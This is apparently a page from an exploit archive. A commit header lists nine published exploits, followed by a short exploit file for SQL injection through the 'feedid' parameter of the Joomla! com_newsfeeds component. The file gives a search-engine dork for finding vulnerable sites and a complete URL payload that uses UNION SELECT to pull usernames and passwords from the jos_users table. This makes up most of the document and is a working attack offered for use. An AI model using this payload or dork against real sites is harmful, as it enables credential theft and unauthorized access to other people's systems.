153c392dd9
9 changes to exploits/shellcodes ASUS AAHM 1.00.22 - 'asHmComSvc' Unquoted Service Path Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection WatchGuard Fireware AD Helper Component 5.8.5.10317 - Credential Disclosure Wordpress Plugin Appointment Booking Calendar 1.3.34 - CSV Injection HRSALE 1.1.8 - Cross-Site Request Forgery (Add Admin) rConfig 3.93 - 'ajaxAddTemplate.php' Authenticated Remote Code Execution rConfig 3.9 - 'searchColumn' SQL Injection Horde Groupware Webmail Edition 5.2.22 - PHP File Inclusion Horde Groupware Webmail Edition 5.2.22 - PHAR Loading
16 lines
No EOL
584 B
Text
16 lines
No EOL
584 B
Text
# Exploit Title: Joomla! Component com_newsfeeds 1.0 - 'feedid' SQL Injection
|
|
# Date: 2020-03-10
|
|
# Author: Milad Karimi
|
|
# Software Link:
|
|
# Version:
|
|
# Category : webapps
|
|
# Tested on: windows 10 , firefox
|
|
# CVE : CWE-89
|
|
# Dork: inurl:index.php?option=com_newsfeeds
|
|
|
|
|
|
index.php?option=com_newsfeeds&view=categories&feedid=[sqli]
|
|
|
|
Example:
|
|
|
|
http://[site]/index.php?option=com_newsfeeds&view=categories&feedid=-1%20union%20select%201,concat%28username,char%2858%29,password%29,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20jos_users-- |